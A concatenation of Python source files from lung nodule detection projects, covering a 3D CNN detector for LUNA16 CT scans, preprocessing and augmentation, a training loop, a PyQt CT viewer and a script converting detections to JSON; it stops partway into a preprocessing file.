self._init_fc(self.fc_id_2048_1_w)
self._init_fc(self.fc_id_2048_2_w)
self._init_fc(self.fc_id_256_1_0_w)
self._init_fc(self.fc_id_256_1_1_w)
self._init_fc(self.fc_id_256_2_0_w)
self._init_fc(self.fc_id_256_2_1_w)
self._init_fc(self.fc_id_256_2_2_w)
"""
@staticmethod
def _init_reduction(reduction):
# conv
nn.init.kaiming_normal_(reduction[0].weight, mode='fan_in')
#nn.init.constant_(reduction[0].bias, 0.)
# bn
nn.init.normal_(reduction[1].weight, mean=1., std=0.02)
nn.init.constant_(reduction[1].bias, 0.)
@staticmethod
def _init_fc(fc):
nn.init.kaiming_normal_(fc.weight, mode='fan_out')
#nn.init.normal_(fc.weight, std=0.001)
nn.init.constant_(fc.bias, 0.)
def forward(self, x):
x = self.backone(x)
x_attention = self.ha1(x)
#x_attn, x_theta = self.ha1(x)
x = x * x_attention
p1 = self.p1(x)
p2 = self.p2(x)
p3 = self.p3(x)
zg_p1 = self.maxpool_zg_p1(p1)
zg_p2 = self.maxpool_zg_p2(p2)
zg_p3 = self.maxpool_zg_p3(p3)
zp2 = self.maxpool_zp2(p2)
z0_p2 = zp2[:, :, 0:1, :]
z1_p2 = zp2[:, :, 1:2, :]
zp3 = self.maxpool_zp3(p3)
z0_p3 = zp3[:, :, 0:1, :]
z1_p3 = zp3[:, :, 1:2, :]
z2_p3 = zp3[:, :, 2:3, :]
fg_p1 = self.reduction_0(zg_p1).squeeze(dim=3).squeeze(dim=2)
fg_p2 = self.reduction_1(zg_p2).squeeze(dim=3).squeeze(dim=2)
fg_p3 = self.reduction_2(zg_p3).squeeze(dim=3).squeeze(dim=2)
f0_p2 = self.reduction_3(z0_p2).squeeze(dim=3).squeeze(dim=2)
f1_p2 = self.reduction_4(z1_p2).squeeze(dim=3).squeeze(dim=2)
f0_p3 = self.reduction_5(z0_p3).squeeze(dim=3).squeeze(dim=2)
f1_p3 = self.reduction_6(z1_p3).squeeze(dim=3).squeeze(dim=2)
f2_p3 = self.reduction_7(z2_p3).squeeze(dim=3).squeeze(dim=2)
'''
l_p1 = self.fc_id_2048_0(zg_p1.squeeze(dim=3).squeeze(dim=2))
l_p2 = self.fc_id_2048_1(zg_p2.squeeze(dim=3).squeeze(dim=2))
l_p3 = self.fc_id_2048_2(zg_p3.squeeze(dim=3).squeeze(dim=2))
'''
l_p1 = self.fc_id_2048_0(fg_p1)
l_p2 = self.fc_id_2048_1(fg_p2)
l_p3 = self.fc_id_2048_2(fg_p3)
l0_p2 = self.fc_id_256_1_0(f0_p2)
l1_p2 = self.fc_id_256_1_1(f1_p2)
l0_p3 = self.fc_id_256_2_0(f0_p3)
l1_p3 = self.fc_id_256_2_1(f1_p3)
l2_p3 = self.fc_id_256_2_2(f2_p3)
#print("self.fc_id_2048_0_w(fg_p1).shape:",self.fc_id_2048_0_w(fg_p1).shape)
#print("fg_p1.shape:", fg_p1.shape)
lfg_p1 = self.fc_id_2048_0_w(fg_p1) * fg_p1
#print("lfg_p1.shape:", lfg_p1.shape)
lfg_p2 = self.fc_id_2048_1_w(fg_p2) * fg_p2
lfg_p3 = self.fc_id_2048_2_w(fg_p3) * fg_p3
lf0_p2 = self.fc_id_256_1_0_w(f0_p2) * f0_p2
lf1_p2 = self.fc_id_256_1_1_w(f1_p2) * f1_p2
lf0_p3 = self.fc_id_256_2_0_w(f0_p3) * f0_p3
lf1_p3 = self.fc_id_256_2_1_w(f1_p3) * f1_p3
lf2_p3 = self.fc_id_256_2_2_w(f2_p3) * f2_p3
predict = torch.cat([lfg_p1, lfg_p2, lfg_p3, lf0_p2, lf1_p2, lf0_p3, lf1_p3, lf2_p3], dim=1)
g1 = self.fc_g(predict)
#predict = torch.cat([lfg_p1, lf0_p2, lf1_p2, lf0_p3, lf1_p3, lf2_p3], dim=1)
#return predict
return g1
``` |
{
"source": "JiazeWang/Luna16",
"score": 2
} |
#### File: Luna16/model/net.py
```python
import torch
from torch import nn
from configs import ANCHOR_SIZES
class PostRes(nn.Module):
def __init__(self, n_in, n_out, stride=1):
super(PostRes, self).__init__()
self.conv1 = nn.Conv3d(n_in, n_out, kernel_size=3, stride=stride, padding=1)
self.bn1 = nn.BatchNorm3d(n_out)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv3d(n_out, n_out, kernel_size=3, padding=1)
self.bn2 = nn.BatchNorm3d(n_out)
if stride != 1 or n_out != n_in:
self.shortcut = nn.Sequential(
nn.Conv3d(n_in, n_out, kernel_size=1, stride=stride),
nn.BatchNorm3d(n_out))
else:
self.shortcut = None
def forward(self, x):
residual = x
if self.shortcut is not None:
residual = self.shortcut(x)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out += residual
out = self.relu(out)
return out
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.preBlock = nn.Sequential(
nn.Conv3d(1, 24, kernel_size=3, padding=1),
nn.BatchNorm3d(24),
nn.ReLU(inplace=True),
nn.Conv3d(24, 24, kernel_size=3, padding=1),
nn.BatchNorm3d(24),
nn.ReLU(inplace=True))
num_blocks_forw = [2, 2, 3, 3]
num_blocks_back = [3, 3]
self.featureNum_forw = [24, 32, 64, 64, 64]
self.featureNum_back = [128, 64, 64]
for i in range(len(num_blocks_forw)):
blocks = []
for j in range(num_blocks_forw[i]):
if j == 0:
blocks.append(PostRes(self.featureNum_forw[i], self.featureNum_forw[i + 1]))
else:
blocks.append(PostRes(self.featureNum_forw[i + 1], self.featureNum_forw[i + 1]))
setattr(self, 'forw' + str(i + 1), nn.Sequential(*blocks))
for i in range(len(num_blocks_back)):
blocks = []
for j in range(num_blocks_back[i]):
if j == 0:
if i == 0:
addition = 3
else:
addition = 0
blocks.append(PostRes(self.featureNum_back[i + 1] + self.featureNum_forw[i + 2] + addition,
self.featureNum_back[i]))
else:
blocks.append(PostRes(self.featureNum_back[i], self.featureNum_back[i]))
setattr(self, 'back' + str(i + 2), nn.Sequential(*blocks))
self.maxpool1 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.maxpool2 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.maxpool3 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.maxpool4 = nn.MaxPool3d(kernel_size=2, stride=2, return_indices=True)
self.unmaxpool1 = nn.MaxUnpool3d(kernel_size=2, stride=2)
self.unmaxpool2 = nn.MaxUnpool3d(kernel_size=2, stride=2)
self.path1 = nn.Sequential(
nn.ConvTranspose3d(64, 64, kernel_size=2, stride=2),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True))
self.path2 = nn.Sequential(
nn.ConvTranspose3d(64, 64, kernel_size=2, stride=2),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True))
self.drop = nn.Dropout3d(p=0.5, inplace=False)
self.output = nn.Sequential(nn.Conv3d(self.featureNum_back[0], 64, kernel_size=1),
nn.ReLU(),
nn.Conv3d(64, 5 * len(ANCHOR_SIZES), kernel_size=1))
def forward(self, x, coord):
out = self.preBlock(x) # 16
out_pool, indices0 = self.maxpool1(out)
out1 = self.forw1(out_pool) # 32
out1_pool, indices1 = self.maxpool2(out1)
out2 = self.forw2(out1_pool) # 64
out2_pool, indices2 = self.maxpool3(out2)
out3 = self.forw3(out2_pool) # 96
out3_pool, indices3 = self.maxpool4(out3)
out4 = self.forw4(out3_pool) # 96
rev3 = self.path1(out4)
comb3 = self.back3(torch.cat((rev3, out3), 1)) # 96+96
rev2 = self.path2(comb3)
comb2 = self.back2(torch.cat((rev2, out2, coord), 1)) # 64+64
comb2 = self.drop(comb2)
out = self.output(comb2)
size = out.size()
out = out.view(out.size(0), out.size(1), -1)
out = out.transpose(1, 2).contiguous().view(size[0], size[2], size[3], size[4], len(ANCHOR_SIZES), 5)
return out
```
#### File: Luna16/prepare/_classes.py
```python
import scipy.misc
import numpy as np
import SimpleITK as sitk
from prepare.utility import get_segmented_lungs, get_augmented_cube
from configs import RESOURCES_PATH, OUTPUT_PATH
from glob import glob
from skimage.measure import regionprops
class CTScan(object):
def __init__(self, seriesuid, centers, radii, clazz):
self._seriesuid = seriesuid
self._centers = centers
paths = glob(f'''{RESOURCES_PATH}/*/{self._seriesuid}.mhd''')
path = paths[0]
self._ds = sitk.ReadImage(path)
self._spacing = np.array(list(reversed(self._ds.GetSpacing())))
self._origin = np.array(list(reversed(self._ds.GetOrigin())))
self._image = sitk.GetArrayFromImage(self._ds)
self._radii = radii
self._clazz = clazz
self._mask = None
def preprocess(self):
self._resample()
self._segment_lung_from_ct_scan()
self._normalize()
self._zero_center()
self._change_coords()
def save_preprocessed_image(self):
subdir = 'negatives' if self._clazz == 0 else 'positives'
file_path = f'''preprocessed/{subdir}/{self._seriesuid}.npy'''
np.save(f'{OUTPUT_PATH}/{file_path}', self._image)
def get_info_dict(self):
(min_z, min_y, min_x, max_z, max_y, max_x) = (None, None, None, None, None, None)
for region in regionprops(self._mask):
min_z, min_y, min_x, max_z, max_y, max_x = region.bbox
assert (min_z, min_y, min_x, max_z, max_y, max_x) != (None, None, None, None, None, None)
min_point = (min_z, min_y, min_x)
max_point = (max_z, max_y, max_x)
return {'seriesuid': self._seriesuid, 'radii': self._radii, 'centers': self._centers,
'spacing': list(self._spacing), 'lungs_bounding_box': [min_point, max_point], 'class': self._clazz}
def _resample(self):
spacing = np.array(self._spacing, dtype=np.float32)
new_spacing = [1, 1, 1]
imgs = self._image
new_shape = np.round(imgs.shape * spacing / new_spacing)
true_spacing = spacing * imgs.shape / new_shape
resize_factor = new_shape / imgs.shape
imgs = scipy.ndimage.interpolation.zoom(imgs, resize_factor, mode='nearest')
self._image = imgs
self._spacing = true_spacing
def _segment_lung_from_ct_scan(self):
result_img = []
result_mask = []
for slicee in self._image:
rimg, rmsk = get_segmented_lungs(slicee)
result_img.append(rimg)
result_mask.append(rmsk)
self._image = np.asarray(result_img)
self._mask = np.asarray(result_mask, dtype=int)
def _world_to_voxel(self, worldCoord):
stretchedVoxelCoord = np.absolute(np.array(worldCoord) - np.array(self._origin))
voxelCoord = stretchedVoxelCoord / np.array(self._spacing)
return voxelCoord.astype(int)
def _get_world_to_voxel_coords(self, idx):
return tuple(self._world_to_voxel(self._centers[idx]))
def _get_voxel_coords(self):
voxel_coords = [self._get_world_to_voxel_coords(j) for j in range(len(self._centers))]
return voxel_coords
def _change_coords(self):
new_coords = self._get_voxel_coords()
self._centers = new_coords
def _normalize(self):
MIN_BOUND = -1200
MAX_BOUND = 600.
self._image = (self._image - MIN_BOUND) / (MAX_BOUND - MIN_BOUND)
self._image[self._image > 1] = 1.
self._image[self._image < 0] = 0.
self._image *= 255.
def _zero_center(self):
PIXEL_MEAN = 0.25 * 256
self._image = self._image - PIXEL_MEAN
class PatchMaker(object):
def __init__(self, seriesuid: str, coords: list, radii: list, spacing: list, lungs_bounding_box: list,
file_path: str,
clazz: int):
self._seriesuid = seriesuid
self._coords = coords
self._spacing = spacing
self._radii = radii
self._image = np.load(file=f'{file_path}')
self._clazz = clazz
self._lungs_bounding_box = lungs_bounding_box
def _get_augmented_patch(self, idx, rot_id=None):
return get_augmented_cube(img=self._image, radii=self._radii, centers=self._coords,
spacing=tuple(self._spacing), rot_id=rot_id, main_nodule_idx=idx,
lungs_bounding_box=self._lungs_bounding_box)
def get_augmented_patches(self):
radii = self._radii
list_of_dicts = []
for i in range(len(self._coords)):
times_to_sample = 1
if radii[i] > 15.:
times_to_sample = 2
elif radii[i] > 20.:
times_to_sample = 6
for j in range(times_to_sample):
rot_id = int((j / times_to_sample) * 24 + np.random.randint(0, int(24 / times_to_sample)))
img, radii2, centers, lungs_bounding_box, spacing, existing_nodules_in_patch = \
self._get_augmented_patch(idx=i, rot_id=rot_id)
existing_radii = [radii2[i] for i in existing_nodules_in_patch]
existing_centers = [centers[i] for i in existing_nodules_in_patch]
subdir = 'negatives' if self._clazz == 0 else 'positives'
file_path = f'''augmented/{subdir}/{self._seriesuid}_{i}_{j}.npy'''
list_of_dicts.append(
{'seriesuid': self._seriesuid, 'centers': existing_centers, 'sub_index': f'{i}_{j}',
'lungs_bounding_box': lungs_bounding_box, 'radii': existing_radii, 'class': self._clazz})
np.save(f'{OUTPUT_PATH}/{file_path}', img)
return list_of_dicts
```
#### File: JiazeWang/Luna16/train.py
```python
import random
import torch
import numpy as np
import time
import os
from model.net import Net
from model.loss import Loss
from torch.autograd import Variable
import itertools
import pandas as pd
from main.dataset import LunaDataSet
from torch.utils.data import DataLoader
from configs import VAL_PCT, TOTAL_EPOCHS, DEFAULT_LR, OUTPUT_PATH
from glob import glob
def get_lr(epoch):
if epoch <= TOTAL_EPOCHS * 0.5:
lr = DEFAULT_LR
elif epoch <= TOTAL_EPOCHS * 0.8:
lr = 0.1 * DEFAULT_LR
else:
lr = 0.01 * DEFAULT_LR
return lr
def train(data_loader, net, loss, epoch, optimizer, get_lr, save_dir='./models/'):
print("****************training:*******************")
start_time = time.time()
net.train()
lr = get_lr(epoch)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
metrics = []
for i, (data, target, coord) in enumerate(data_loader):
if torch.cuda.is_available():
data = Variable(data.cuda())
target = Variable(target.cuda())
coord = Variable(coord.cuda())
data = data.float()
target = target.float()
coord = coord.float()
output = net(data, coord)
loss_output = loss(output, target)
optimizer.zero_grad()
loss_output[0].backward()
optimizer.step()
loss_output[0] = loss_output[0].item()
metrics.append(loss_output)
break
metrics = np.asarray(metrics, np.float32)
if epoch % 10 == 0:
net_state_dict = net.state_dict()
for key in net_state_dict.keys():
net_state_dict[key] = net_state_dict[key].cpu()
torch.save({
'epoch': epoch,
'save_dir': save_dir,
'model_state_dict': net_state_dict,
'optimizer_state_dict': optimizer.state_dict(),
'loss': np.mean(metrics[:, 0])}, os.path.join(save_dir, f'''{epoch}.ckpt'''))
end_time = time.time()
print(f'''Epoch {epoch} (lr {lr})''')
print(f'''Train: tpr {100.0 * np.sum(metrics[:, 6]) / np.sum(metrics[:, 7])},
tnr {100.0 * np.sum(metrics[:, 8]) / np.sum(metrics[:, 9])},
total pos {np.sum(metrics[:, 7])}, total neg {np.sum(metrics[:, 9])},
time {end_time - start_time}''')
print(f'''loss {np.mean(metrics[:, 0])}, classify loss {np.mean(metrics[:, 1])},
regress loss {np.mean(metrics[:, 2])}, {np.mean(metrics[:, 3])},
{np.mean(metrics[:, 4])}, {np.mean(metrics[:, 5])}''')
def validate(data_loader, net, loss):
print("****************validation:*******************")
start_time = time.time()
net.eval()
metrics = []
for i, (data, target, coord) in enumerate(data_loader):
if torch.cuda.is_available():
data = Variable(data.cuda())
target = Variable(target.cuda())
coord = Variable(coord.cuda())
data = data.float()
target = target.float()
coord = coord.float()
output = net(data, coord)
loss_output = loss(output, target, train=False)
loss_output[0] = loss_output[0].item()
metrics.append(loss_output)
break
end_time = time.time()
metrics = np.asarray(metrics, np.float32)
print(f'''time {end_time - start_time}''')
print(f'''loss {np.mean(metrics[:, 0])}, classify loss {np.mean(metrics[:, 1])},
regress loss {np.mean(metrics[:, 2])}, {np.mean(metrics[:, 3])},
{np.mean(metrics[:, 4])}, {np.mean(metrics[:, 5])}''')
def run(load_last_checkpoint=False):
save_dir = f'{OUTPUT_PATH}/models/'
os.makedirs(save_dir, exist_ok=True)
neural_net = Net()
loss_fn = Loss()
optim = torch.optim.SGD(neural_net.parameters(), DEFAULT_LR, momentum=0.9, weight_decay=1e-4)
starting_epoch = 0
initial_loss = None
if load_last_checkpoint:
model_paths = glob(f'''{save_dir}*.ckpt''')
model_names = [int(i.split('/')[-1][:-5]) for i in model_paths]
latest_model_path = f'''{save_dir}{max(model_names)}.ckpt'''
print('loading latest model from:', latest_model_path)
checkpoint = torch.load(latest_model_path)
neural_net.load_state_dict(checkpoint['model_state_dict'])
optim.load_state_dict(checkpoint['optimizer_state_dict'])
starting_epoch = checkpoint['epoch']
initial_loss = checkpoint['loss']
if torch.cuda.is_available():
neural_net = neural_net.cuda()
loss_fn = loss_fn.cuda()
print(f'''Training from epoch: {starting_epoch} towards: {TOTAL_EPOCHS},
with learning rate starting from: {get_lr(starting_epoch)}, and loss: {initial_loss}''')
meta = pd.read_csv(f'{OUTPUT_PATH}/augmented_meta.csv', index_col=0).sample(frac=1).reset_index(drop=True)
meta_group_by_series = meta.groupby(['seriesuid']).indices
list_of_groups = [{i: list(meta_group_by_series[i])} for i in meta_group_by_series.keys()]
random.Random(0).shuffle(list_of_groups)
val_split = int(VAL_PCT * len(list_of_groups))
val_indices = list(itertools.chain(*[list(i.values())[0] for i in list_of_groups[:val_split]]))
train_indices = list(itertools.chain(*[list(i.values())[0] for i in list_of_groups[val_split:]]))
ltd = LunaDataSet(train_indices, meta)
lvd = LunaDataSet(val_indices, meta)
train_loader = DataLoader(ltd, batch_size=1, shuffle=False)
val_loader = DataLoader(lvd, batch_size=1, shuffle=False)
for ep in range(starting_epoch, TOTAL_EPOCHS):
train(train_loader, neural_net, loss_fn, ep, optim, get_lr, save_dir=save_dir)
validate(train_loader, neural_net, loss_fn)
if __name__ == '__main__':
run(load_last_checkpoint=False)
``` |
{
"source": "JiazeWang/lung_nodule_detector",
"score": 2
} |
#### File: dlung_v1/detector_viewer/xai_viewer.py
```python
import sys
import UI_util
import numpy as np
import cv2
import time
import math
from PyQt5 import QtCore, QtGui, QtWidgets
from xai_viewer_ui import Ui_xai_viewer
import torch
import res18_split_focal as detect_model
from torch.nn import DataParallel
from torch.backends import cudnn
from training.utils import *
from training.split_combine import SplitComb
#TODO: nodule view rescale feature add
class Main_Window(QtWidgets.QMainWindow, Ui_xai_viewer):
def __init__(self):
super(Main_Window,self).__init__()
## set path and gpu number
self.init_openpath = '/root/ssd_data/demo/'
self.label_dirpath = '/root/ssd_data/luna_segment_attribute/'
self.detect_resume = './detector.ckpt'
self.gpu = '1'
self.setupUi(self)
self.actionOpen.triggered.connect(self.open)
self.next_button.clicked.connect(self.next_slide)
self.prev_button.clicked.connect(self.prev_slide)
self.detect_button.clicked.connect(self.detect)
self.horizontalScrollBar.valueChanged.connect(self.scroll_slide)
self.listView.clicked.connect(self.click_nodule_list)
self.resolution = np.array([1,1,1])
self.slice_index = 0
self.slice_num = 0
self.slice_width = 0
self.slice_height = 0
self.detect_net, self.split_comber, self.get_pbb \
= self.init_net()
self.stride = 4
self.n_per_run = 1
self.detect_progressBar.setValue(0)
self.fileopen_progressBar.setValue(0)
self.file_dialog = QtWidgets.QFileDialog(directory=self.init_openpath)
self.file_dialog.setNameFilters(["mhd files (*.mhd)", "Images (*.png *.jpg)", "All Files (*.*)"])
self.file_dialog.selectNameFilter("mhd files (*.mhd)")
def keyPressEvent(self, qKeyEvent):
print(qKeyEvent.key())
if qKeyEvent.key() == QtCore.Qt.Key_Z:
print('Key_Left')
self.prev_slide()
elif qKeyEvent.key() == QtCore.Qt.Key_X:
print('Key_Right')
self.next_slide()
#else:
# super().keyPressEvent(qKeyEvent)
def init_net(self):
torch.manual_seed(0)
torch.cuda.set_device(0)
#model = import_module(self.model)
detect_config, detect_net, _, get_pbb = detect_model.get_model()
detect_checkpoint = torch.load(self.detect_resume)
detect_net.load_state_dict(detect_checkpoint['state_dict'])
n_gpu = setgpu(self.gpu)
detect_net = detect_net.cuda()
#loss = loss.cuda()
cudnn.benchmark = True
detect_net = DataParallel(detect_net)
margin = 32
sidelen = 144
split_comber = SplitComb(sidelen, detect_config['max_stride'], detect_config['stride'], margin, detect_config['pad_value'])
print ("init_net complete")
return detect_net, split_comber, get_pbb
def update_slide(self):
img = np.array(self.slice_arr[self.slice_index], dtype=np.uint8)
image = QtGui.QImage(img, self.slice_width, self.slice_height, self.slice_width * 3,
QtGui.QImage.Format_RGB888)
pixmap = QtGui.QPixmap.fromImage(image)
self.slide_show_label.setAlignment(QtCore.Qt.AlignCenter)
self.slide_show_label.setPixmap(pixmap.scaled(791, 481, QtCore.Qt.KeepAspectRatio))
self.slide_view_label.setText("Slide View " + str(self.slice_index) + "/" + str(self.slice_num - 1))
def update_slidebar(self):
self.horizontalScrollBar.blockSignals(True)
self.horizontalScrollBar.setValue(self.slice_index)
self.horizontalScrollBar.blockSignals(False)
def click_nodule_list(self, QModelIndex):
print ("click_nodule_list", QModelIndex.row())
idx = QModelIndex.row()
gt_num = 0
for i in range(len(self.lbb)):
if (self.lbb[i][3] != 0):
gt_num += 1
cand_num = len(self.world_pbb)
if (idx > gt_num - 1):
cand_idx = idx - gt_num
if (int(round(self.world_pbb[cand_idx][1])) < 0):
self.slice_index = 0
elif (int(round(self.world_pbb[cand_idx][1])) > (self.slice_num - 1)):
self.slice_index = self.slice_num - 1
else:
self.slice_index = int(round(self.world_pbb[cand_idx][1]))
else:
gt_idx = idx
self.slice_index = int(round(self.lbb[gt_idx][0]))
self.update_slide()
self.update_slidebar()
def detect(self):
if (self.slice_num <= 0):
return 0
s = time.time()
data, coord2, nzhw = UI_util.split_data(np.expand_dims(self.sliceim_re, axis=0),
self.stride, self.split_comber)
self.detect_progressBar.setValue(10)
self.gt_path = self.label_dirpath + self.pt_num + '_label.npy'
labels = np.load(self.gt_path)
e = time.time()
self.lbb, self.world_pbb = UI_util.predict_nodule(self.detect_net, data, coord2, nzhw, labels,
self.n_per_run, self.split_comber, self.get_pbb, self.detect_progressBar)
nodule_items = []
for i in range(len(self.lbb)):
if self.lbb[i][3] != 0:
nodule_items.append('gt_' + str(i))
for i in range(len(self.world_pbb)):
nodule_items.append('cand_' + str(i) + ' ' + str(round(self.world_pbb[i][0], 2)))
model = QtGui.QStandardItemModel()
for nodule in nodule_items:
model.appendRow(QtGui.QStandardItem(nodule))
self.listView.setModel(model)
print('elapsed time is %3.2f seconds' % (e - s))
UI_util.draw_nodule_rect(self.lbb, self.world_pbb, self.slice_arr)
# attrbute_list = []
# for i in range(len(self.world_pbb)):
# print (self.world_pbb[i][1:])
# print (np.shape(self.sliceim_re))
# crop_img, _ = UI_util.crop_nodule_arr_2ch(self.world_pbb[i][1:], np.expand_dims(self.sliceim_re, axis=0))
# output = UI_util.predict_attribute(self.attribute_net, crop_img.unsqueeze(0))
# print (output.cpu().data.numpy())
# attrbute_list.append(output.cpu().data.numpy())
#print ("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test1" + str(i) + ".png")
#print ("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test2" + str(i) + ".png")
#cv2.imwrite("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test1" + str(i) + ".png", crop[0][24])
#cv2.imwrite("/root/workspace/dsb2017_review/DSB2017_1/training/XAI_UI/test2" + str(i) + ".png", crop[1][24])
# self.print_nodule_attribute(attrbute_list)
self.detect_progressBar.setValue(100)
#assert False
self.update_slide()
def open(self):
#TODO: file type check
self.file_dialog.exec_()
fileName = self.file_dialog.selectedFiles()
print("open ",fileName)
if (fileName[0] == ''):
return 0
self.pt_num = fileName[0].split('/')[-1].split('.mhd')[0]
self.detect_progressBar.setValue(0)
self.fileopen_progressBar.setValue(0)
# self.tableWidget.setRowCount(0)
# self.tableWidget.setColumnCount(0)
self.file_name.setText(fileName[0] + " opening ...")
model = QtGui.QStandardItemModel()
self.listView.setModel(model)
sliceim, origin, spacing, isflip = UI_util.load_itk_image(fileName[0])
self.fileopen_progressBar.setValue(10)
if isflip:
sliceim = sliceim[:, ::-1, ::-1]
print('flip!')
sliceim = UI_util.lumTrans(sliceim)
self.sliceim_re, _ = UI_util.resample(sliceim, spacing, self.resolution, self.fileopen_progressBar, order=1)
self.fileopen_progressBar.setValue(45)
self.slice_arr = np.zeros((np.shape(self.sliceim_re)[0], np.shape(self.sliceim_re)[1], np.shape(self.sliceim_re)[2], 3))
self.slice_num = np.shape(self.sliceim_re)[0]
self.slice_height = np.shape(self.sliceim_re)[1]
self.slice_width = np.shape(self.sliceim_re)[2]
for i in range(len(self.sliceim_re)):
self.slice_arr[i] = cv2.cvtColor(self.sliceim_re[i], 8)
self.fileopen_progressBar.setValue(45 + (45/len(self.sliceim_re))*(i+1))
print ("finish convert")
self.slice_index = int(self.slice_num/2)
img = np.array(self.slice_arr[self.slice_index], dtype=np.uint8)
image = QtGui.QImage(img, self.slice_width, self.slice_height, self.slice_width*3, QtGui.QImage.Format_RGB888)
self.update_slide()
self.file_name.setText(fileName[0] + " open completed ...")
self.horizontalScrollBar.setMaximum(self.slice_num - 1)
self.horizontalScrollBar.setMinimum(0)
self.update_slidebar()
self.fileopen_progressBar.setValue(100)
def next_slide(self):
if self.slice_index < self.slice_num - 1:
self.slice_index += 1
if (self.slice_num > 0):
self.update_slide()
self.update_slidebar()
def prev_slide(self):
if self.slice_index > 0:
self.slice_index -= 1
if (self.slice_num > 0):
self.update_slide()
self.update_slidebar()
def scroll_slide(self):
if (self.slice_num > 0):
self.slice_index = self.horizontalScrollBar.value()
self.update_slide()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
app.setApplicationName("XAI Viewer")
window = Main_Window()
window.show()
app.exec_()
```
#### File: lung_nodule_detector/dlung_v1/generate_json.py
```python
import numpy as np
import sys
from layers import nms, iou, acc
import time
import multiprocessing as mp
import math
import SimpleITK as sitk
import os
import pandas
import csv
import io
from config import config
import json
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def convert_worldcoord(idx, pbb, filename):
origin = np.load(filename+'_origin.npy')
spacing = np.load(filename+'_spacing.npy')
for label in pbb:
pos_ori = label[1:4]
radious_ori = label[4]
#pos_ori = pos_ori + extendbox[:, 0]
pos_ori = pos_ori * resolution / spacing
#pos_ori = pos_ori * spacing
#pos_ori = pos_ori + origin
pos_ori = pos_ori[::-1]
radious_ori = radious_ori / spacing[1] * resolution[1]
radious_ori = radious_ori * spacing[1]
label[1:4] = pos_ori
label[4] = radious_ori
label[0] = sigmoid(label[0])
return pbb
def duplicate_file(in_filename):
out_filename = in_filename + '.bin'
byte_string = ''
with open(in_filename, 'r') as infile:
with open(out_filename, 'wb') as outfile:
char = infile.read(1)
byte = ord(char)
# print byte
byte_string += chr(byte)
while char != "":
char = infile.read(1)
if char != "":
byte = ord(char)
# print byte
byte_string += chr(byte)
outfile.write(byte_string)
outfile.close()
def convert_json(input, output, thresholds=0.5):
with open("record_folder_series.txt", 'r') as f:
lines = f.readlines()
patientdic = {}
studydic = {}
for line in lines:
line = line.rstrip()
line = line.split(" ")
name = line[0]
patientname = name.split("/")[1]
studyname = name[8:]
for i in line[1:]:
patientdic[i] = patientname
studydic[i] = studyname
with open(input, "r") as f:
lines = f.readlines()
NoduleClass, NoduleScore, NoduleCoordinates, NoduleDiameter= [], [], [], []
nudule = {}
num = 0
result = []
record = lines[1].split(",")[0]
lines.append(lines[1])
for line in lines[1:]:
nodule_dic = {}
line = line.rstrip()
line = line.split(",")
if line[0] == record and num+1<len(lines[1:]):
NoduleScore.append(line[-1])
if float(line[-1])> thresholds:
NoduleClass.append(1)
else:
NoduleClass.append(0)
NoduleCoordinates.append([line[1], line[2], line[3]])
NoduleDiameter.append(line[4])
else:
nudule = {}
series = {"SeriesName": record, \
"PatientFolder": patientdic[record], \
"StudyFolder": studydic[record],\
"nodules": nudule,}
nudule["NoduleScore"] = NoduleScore
nudule["NoduleClass"] = NoduleClass
nudule["NoduleCoordinates"] = NoduleCoordinates
nudule["NoduleDiameter"] = NoduleDiameter
NoduleClass, NoduleScore, NoduleCoordinates, NoduleDiameter = [], [], [], []
if float(line[-1])> thresholds:
NoduleClass.append(1)
else:
NoduleClass.append(0)
NoduleScore.append(line[-1])
NoduleCoordinates.append([line[1], line[2], line[3]])
NoduleDiameter.append(line[4])
record = line[0]
result.append(series)
num = num + 1
with open(output,'w',encoding='utf-8') as f:
f.write(json.dumps(result,indent=2))
if __name__ == '__main__':
pbb = []
resolution = np.array([1,1,1])
submit_file = 'submission.txt'
filename_dict = {}
csv_submit = []
csv_sid = []
with open("record_test.txt", 'r') as f:
lines = f.readlines()
num = 0
if not os.path.exists(config["result"]):
os.makedirs(config["result"])
for i in range(len(lines)):
print("processing %s"%i)
line = lines[i].rstrip()
pbbdir = np.load(config["result"] + line + ".npy")
origin_dir = np.load(config["npy_dir"] + line + "_origin.npy")
spacing_dir = np.load(config["npy_dir"] + line + "_spacing.npy")
pbb_item = pbbdir
filename_dict[i] = str(line)
pbb_item = pbb_item[pbb_item[:, 0].argsort()[::-1]]
pbb_append_list = []
for item in pbb_item:
if sigmoid(item[0]) < 0.1:
continue
is_overlap = False
for appended in pbb_append_list:
minimum_dist = 3
dist = math.sqrt(
math.pow(appended[0] - item[0], 2) + math.pow(appended[1] - item[1], 2) + math.pow(
appended[2] - item[2], 2))
if (dist < minimum_dist):
is_overlap = True
break;
if not is_overlap:
pbb_append_list.append(item)
pbb.append(np.array(pbb_append_list))
pbb = np.array(pbb)
conf_th = 0.1
nms_th = 0.3
detect_th = 0.3
for i in range(len(pbb)):
nms_pbb = nms(pbb[i], nms_th)
world_pbb = convert_worldcoord(i, nms_pbb, config["npy_dir"]+filename_dict[i])
s_id = filename_dict[i]
for candidate in world_pbb:
csv_submit.append([s_id, candidate[1], candidate[2], candidate[3], candidate[4], candidate[0]])
df_annos = pandas.DataFrame(csv_submit, columns=["seriesuid", "coordX", "coordY", "coordZ", "size", "probability"])
df_annos.to_csv(submit_file, index=False)
convert_json('submission.txt', "result.json")
```
#### File: lung_nodule_detector/dlung_v1/prepare.py
```python
import os
import shutil
import numpy as np
import SimpleITK as sitk
import scipy.ndimage
from scipy.ndimage.measurements import label
from scipy.ndimage.interpolation import zoom
from scipy.ndimage.morphology import binary_dilation,generate_binary_structure
from skimage.morphology import convex_hull_image
from skimage import measure, morphology
from lungmask import mask
import pandas
import sys
import math
import glob
from multiprocessing import Pool
from config import config
def get_lung(filename, output):
